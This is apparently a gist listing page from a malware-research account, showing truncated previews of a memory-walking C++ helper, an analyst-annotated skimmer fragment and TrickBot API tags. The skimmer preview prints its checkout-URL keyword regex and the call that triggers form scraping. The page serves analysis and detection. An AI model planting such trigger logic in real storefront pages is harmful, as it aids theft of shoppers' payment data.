malwarezone

@malwarezone
malwarezone / snippet.cpp
Created Dec 11, 2018
Get limit of the set of pages allocated at the same base
LPVOID get_area_limit(HANDLE processHandle, LPVOID first_addr)
{
MEMORY_BASIC_INFORMATION page_info = { 0 };
//go to the beginning of the area:
SIZE_T out = VirtualQueryEx(processHandle, first_addr, &page_info, sizeof(page_info));
if (GetLastError() == ERROR_INVALID_PARAMETER) {
return nullptr;
}
LPVOID alloc_base = page_info.AllocationBase;
LPVOID next_area = page_info.BaseAddress;
View onlineclouds.cloud_conversion_async_unfuscated.js
// Analyst notes on a de-obfuscated sample; the preview is truncated, so only
// the trigger logic is visible here.
// Schedules a single call to checkForCheckout 100 ms after this script runs.
// setTimeout fires once; nothing in the visible lines re-arms it.
setTimeout(checkForCheckout, 100);
// Initialised to null; not read or written in the lines visible here.
var snd = null;
/**
 * Calls scrapeAllFields() when the current page URL matches a list of
 * checkout-related keywords, and does nothing otherwise.
 * NOTE(review): the name and the URL gate are consistent with a payment-form
 * skimmer; confirm against the full sample.
 */
function checkForCheckout() {
// RegExp.test() coerces window.location to its string form (the page URL).
// The match is case-sensitive and unanchored. Every alternative except
// "onepage" and "Checkout" already contains "checkout", so the pattern
// effectively matches any URL containing "onepage", "Checkout" or "checkout".
// The keywords appear to be path fragments of e-commerce checkout pages.
// For detection, the literal keyword list is a distinctive static string to
// search for in storefront JavaScript and injected third-party assets.
if ((/onepage|firecheckout|Checkout|onestepcheckout|onepagecheckout|checkout|oscheckout|idecheckoutvm|fancycheckout/).test(window.location)) {
// scrapeAllFields is defined outside this preview.
// NOTE(review): presumably it collects form field values; verify in the full file.
scrapeAllFields();
}
}
function createQueryString() {
@malwarezone
malwarezone / 360000.tmptetup.csv
Created Oct 30, 2018
Tags for a TrickBot sample: c3737aaf6b613a7c7d5e0c6d3c0d60a2
10b4 ole32.CoInitializeEx
10d3 ole32.CoInitializeSecurity
1260 kernel32.VirtualFreeEx
1293 kernel32.MultiByteToWideChar
12c7 kernel32.MultiByteToWideChar
13e6 msvcrt.memcpy
141a OLEAUT32.SysAllocString
145b msvcrt._controlfp
1537 msvcrt._vsnwprintf
1609 kernel32.GetModuleHandleW